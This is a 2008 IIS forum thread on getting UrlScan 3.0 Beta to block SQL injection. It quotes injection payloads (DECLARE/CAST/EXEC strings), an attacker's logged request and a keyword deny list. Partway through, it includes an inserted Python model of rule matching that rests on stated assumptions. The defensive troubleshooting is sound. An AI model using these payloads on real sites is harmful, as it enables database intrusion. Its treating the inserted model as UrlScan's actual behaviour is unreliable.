
Thread: UrlScan 3.0 Beta not capturing SQL Injection

Last post 08-19-2008 10:01 AM by Rovastar. 43 replies.


  • 08-13-2008, 2:51 PM In reply to

    • wadeh
    • Top 50 Contributor
    • Joined on 04-19-2005, 10:17 PM
    • Posts 112

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    The permissions on your logging directory look fine.

    Since there are no 404s in the w3svc file and no entries in the urlscan.log file, it seems clear that UrlScan has not rejected any requests.

    If you can send me your urlscan.ini file, I can take a look at it.

    Thanks,
    -Wade

  • 08-13-2008, 6:24 PM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    Hi Wade, thank you very much for the review. I fixed the issue; it was because the ISAPI filter was set for two web apps on the same IIS instance.

    Now I have a question about urlscan.ini:

    For the URL query string, I want it to filter out some keywords that may be bad, such as Delete or EXEC, to avoid SQL injection, but it looks like the rule must be attached to specific file types.

    [SQL Injection]
    AppliesTo=.asp,.aspx  ; this means it only applies to these two file types. My question is here
    DenyDataSection=SQL Injection Strings
    ScanUrl=0
    ScanAllRaw=0
    ScanQueryString=1
    ScanHeaders=

    But I do not want the config tied to any file extension. It should apply to all files, even when there is no file. For example, there may be a URL like

    http://myserver/mysite/mypath?a=b;@S...

    The app will translate the URL to one type of file. How do I configure it for this case?

    Is it possible to put the following rules in the [DenyQueryStringSequences] section?

    --
    %3b ; a semicolon
    /*
    @ ; also catches @@
    char ; also catches nchar and varchar
    alter
    begin
    cast
    convert
    create
    cursor
    declare
    delete
    drop
    end
    exec ; also catches execute
    fetch
    insert
    kill
    open
    select
    sys ; also catches sysobjects and syscolumns
    table
    update

     

  • 08-14-2008, 4:08 PM In reply to

    • wadeh
    • Top 50 Contributor
    • Joined on 04-19-2005, 10:17 PM
    • Posts 112

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    KentZhou:
    I do not want to the config connect to any file extension. it should be for all file even there is no file.

    UrlScan runs before IIS has determined whether the request targets a file or some other dynamic resource.  All of UrlScan's rules therefore apply regardless of this.

    The AppliesTo property is optional.  If you want to have a rule apply to all requests, and not just certain file extensions, then you can leave the AppliesTo property blank and it will apply to all requests.

    Thanks,
    -Wade

  • 08-15-2008, 11:24 AM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    Wade,

    FYI - In my test case, the reason the SQL injection attacks were not getting detected was because the rule had "AppliesTo=" set to ".asp,.aspx".  Well, I was sending a test attack to http://localmachinename/?declare%20@s=CAST(XYZ%20AS%20NVARCHAR(3000));EXEC(@S);

    In this case I'm not calling any .asp or .aspx page specifically, so if I launch the attack at the default page without specifying a filename.ext I can bypass the rule.

    By changing "AppliesTo=.asp,.aspx" to "AppliesTo=", UrlScan detects this attack.

    FWIW

    Jose Lopez

  • 08-15-2008, 12:30 PM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    Very Interesting. I'll try this too. I too left the AppliesTo in there.

    I just checked mine (didn't make the change above) and it is working again. I dunno, maybe another IIS restart a day or two ago kicked it off or something.

    Luckily I will finally have some time to investigate this next week.

  • 08-15-2008, 12:56 PM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    Correct, it is picking it up for one site and one site only.

    Still getting hammered.

    I did a quick search for CAST( in the logs:

    2008-08-14 08:16:46 GET /presscuttingdetails.asp id=38;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(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%20AS%20VARCHAR(4000));EXEC(@S);-

    Yet UrlScan does detect:

    [08-13-2008 - 19:53:40] Client at 118.81.53.156: Rule ' SQL Injection' detected string '--' in the query string. UrlScan is in Logging-Only mode - request allowed.  Site Instance='1992215310', Raw URL='/english/businessdirectory_map.asp

    I checked no-one else has restarted anything for these servers for days.

    Sadly I didn't have logging on the '1992215310' site, as it is only our smarter stats website for clients' sites going on our hosting prod box.

    Run out of time, more info later.

     

  • 08-15-2008, 7:10 PM In reply to

    • wadeh
    • Top 50 Contributor
    • Joined on 04-19-2005, 10:17 PM
    • Posts 112

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    Jose,

    Thanks for the follow up.  It's good to hear that you found this!

    -Wade

  • 08-15-2008, 10:19 PM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    Hi guys, doing it the following way works fine:

    AppliesTo=.asp,.aspx,.

    Use a dot (.) for any type; it even captures requests with no file extension.

     

  • 08-18-2008, 8:23 AM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    Going to dedicate some time to trying to work this out over the next few days.

    The workaround:

    AppliesTo=.asp,.aspx,.

    Doesn't work for me. :(

     

  • 08-18-2008, 8:51 AM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    Rovastar,

    I can confirm that the workaround that KentZhou posted works.  I have included below the contents of the RuleList section in the UrlScan.ini as I have it in my test box.

    After changing the rule though I issued an iisreset /restart command before I tested so the UrlScan.ini's settings were taken into account.  I don't know if there is a cycle by which these settings in the .ini file are refreshed. 

    I tried issuing the following requests, all of which were stopped by UrlScan:

    http://localhost/?declare
    http://localhost/default.asp?declare
    http://localhost/default.aspx?declare


    RuleList=SQLInjection

    [SQLInjection]
    AppliesTo=.asp,.aspx,.
    DenyDataSection=SQL Injection Strings
    ScanUrl=0
    ScanAllRaw=0
    ScanQueryString=1
    ScanHeaders=

    [SQL Injection Strings]
    --
    %3b ; a semicolon
    /*
    @ ; also catches @@
    char ; also catches nchar and varchar
    alter
    begin
    cast
    convert
    create
    cursor
    declare
    delete
    drop
    end
    exec ; also catches execute
    fetch
    insert
    kill
    open
    select
    sys ; also catches sysobjects and syscolumns
    table
    update
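    The following is an added example, not code from UrlScan or from anyone in this thread. It models the part of a UrlScan 3.x rule that this thread turns on (AppliesTo, DenyDataSection, ScanQueryString) and runs the rule above against requests shaped like the ones quoted here, so you can see why "AppliesTo=.asp,.aspx" let the extension-less request through and why a blank AppliesTo, or KentZhou's trailing ".", catches it. Not stated on the page and assumed here: deny strings are matched case-insensitively as substrings of both the raw and the percent-decoded query string, an AppliesTo entry of "." matches paths with no extension, ";" starts a comment anywhere in the file, and RuleList lives under [Options] as it does in the shipped UrlScan.ini.

```python
"""Model of how a UrlScan 3.x rule (AppliesTo, DenyDataSection, ScanQueryString)
decides a request.  Added example, not UrlScan's own code.  Assumed, not stated
in the thread: deny strings are matched case-insensitively as substrings of both
the raw and the percent-decoded query string; an AppliesTo entry of "." matches
paths without an extension (as KentZhou reports); ';' starts a comment."""
from urllib.parse import unquote, urlsplit

# Deny list as posted in the thread; text after ';' is a comment in the file.
DENY_STRINGS = """\
--
%3b ; a semicolon
/*
@ ; also catches @@
char ; also catches nchar and varchar
alter
begin
cast
convert
create
cursor
declare
delete
drop
end
exec ; also catches execute
fetch
insert
kill
open
select
sys ; also catches sysobjects and syscolumns
table
update
"""

def rule_ini(applies_to):
    """Constructed UrlScan.ini fragment: the thread's rule with a chosen AppliesTo.
    In the shipped file RuleList sits under [Options] (assumption)."""
    return (
        "[Options]\nRuleList=SQLInjection\n\n[SQLInjection]\n"
        f"AppliesTo={applies_to}\nDenyDataSection=SQL Injection Strings\n"
        "ScanUrl=0\nScanAllRaw=0\nScanQueryString=1\nScanHeaders=\n\n"
        "[SQL Injection Strings]\n" + DENY_STRINGS
    )

def parse_ini(text):
    """Return {section: [cleaned lines]}; everything after ';' is dropped."""
    sections, current = {}, ""
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        else:
            sections.setdefault(current, []).append(line)
    return sections

def keys(lines):
    """key=value lines of a section as a dict."""
    return {k.strip(): v.strip() for k, v in (l.split("=", 1) for l in lines if "=" in l)}

def path_extension(path):
    """'.asp' for /x/page.asp; '' for / or /x/page (no extension)."""
    last = path.rsplit("/", 1)[-1]
    return ("." + last.rsplit(".", 1)[1]).lower() if "." in last else ""

def rule_applies(rule, path):
    spec = rule.get("AppliesTo", "")
    if not spec:                                  # blank: every request
        return True
    exts = [e.strip().lower() for e in spec.split(",") if e.strip()]
    ext = path_extension(path)
    return ext in exts or (ext == "" and "." in exts)

def scan_request(ini_text, url):
    """None if UrlScan would allow the request, else (rule name, deny string hit)."""
    ini = parse_ini(ini_text)
    parts = urlsplit(url)
    candidates = (parts.query, unquote(parts.query))  # raw pass, unescaped pass
    for name in keys(ini.get("Options", [])).get("RuleList", "").split(","):
        name, rule = name.strip(), keys(ini.get(name.strip(), []))
        if not rule or rule.get("ScanQueryString") != "1" or not rule_applies(rule, parts.path):
            continue
        for deny in ini.get(rule["DenyDataSection"], []):
            if any(deny.lower() in c.lower() for c in candidates):
                return name, deny
    return None

# Constructed requests modelled on the URLs quoted in this thread.
REQUESTS = {
    "no-extension": "http://localhost/?declare%20@s=CAST(XYZ%20AS%20NVARCHAR(3000));EXEC(@S);",
    "asp": "http://localhost/presscuttingdetails.asp?id=38;DECLARE%20@S%20VARCHAR(4000);",
    "aspx": "http://localhost/default.aspx?declare",
    "legit": "http://localhost/contact.asp?email=alice@example.com",
}

def verdicts(applies_to):
    return {k: scan_request(rule_ini(applies_to), u) for k, u in REQUESTS.items()}

if __name__ == "__main__":
    for spec in (".asp,.aspx", "", ".asp,.aspx,."):
        print(f"AppliesTo={spec!r}", verdicts(spec))
```

    Two things the run makes visible. First, with "AppliesTo=.asp,.aspx" the extension-less request is allowed while the same payload on a .asp or .aspx page is denied; a blank AppliesTo or ".asp,.aspx,." denies it too, and since ScanUrl=0 only the query string is ever inspected by this rule. Second, the "legit" request is denied on "@" alone, and entries such as "open", "end" and "table" match as substrings of ordinary parameter values, so a list like this belongs in UrlScan's logging-only mode (the mode the log line earlier in this thread shows) until the false positives for a given site are known.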

  • 08-19-2008, 2:37 AM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    In my case I gave IIS_WPG full access to the logging folder. I run my app pool under a different local user account that is part of the IIS_WPG group, so in theory it should work.

    Currently I run this local user account as part of the Administrators role and it runs fine (x64 IIS 6, W2K3 SP2).

    D:\common\urlscanlogs>cacls .
    D:\common\urlscanlogs BUILTIN\Administrators:F
                          servername\IIS_WPG:(OI)(CI)F
                          BUILTIN\Users:(OI)(CI)F
                          BUILTIN\Administrators:(OI)(CI)F
                          NT AUTHORITY\SYSTEM:(OI)(CI)F
                          CREATOR OWNER:(OI)(CI)(IO)F
                          BUILTIN\Users:(OI)(CI)R
                          BUILTIN\Users:(CI)(special access:)
                                            FILE_APPEND_DATA

                          BUILTIN\Users:(CI)(special access:)
                                            FILE_WRITE_DATA

  • 08-19-2008, 9:07 AM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    apajlopez:

    Rovastar,

    I can confirm that the workaround that KentZhou posted works.  I have included below the contents of the RuleList section in the UrlScan.ini as I have it in my test box.

    After changing the rule though I issued an iisreset /restart command before I tested so the UrlScan.ini's settings were taken into account.  I don't know if there is a cycle by which these settings in the .ini file are refreshed.

     

    Glad to see it is working for others. Mine is not. It works for *some* sites but not all. There seems to be no explanation for this that I can see.

    The fact that it works for some but not all is worrying as you may *think* it is working when it is not.

  • 08-19-2008, 9:22 AM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    Investigating

  • 08-19-2008, 10:01 AM In reply to

    Re: UrlScan 3.0 Beta not capturing SQL Injection

    OK I am finally getting somewhere.

    On one of my servers, out of several hundred sites, 2 seem to be logging; the others do not.

    Now I noticed that these sites have separate application pools.

    I moved a known problem site to a new application pool and then the events were logged.

    Moving it back to the DefaultAppPool it didn't log.

    Further investigation of the difference between the application pools revealed that the DefaultAppPool had an identity of the IWAM user rather than the default Network Service.

    When I changed the newly created app pool to run under the IWAM user account (and restarted the app pool), UrlScan failed to work. Changing it to the Network Service account (and restarting the app pool), it all worked again.

    So my problem at least comes down to which identity you run an app pool under; that determines whether UrlScan will work or not.

    *Phew* Glad that problem is out of the way.
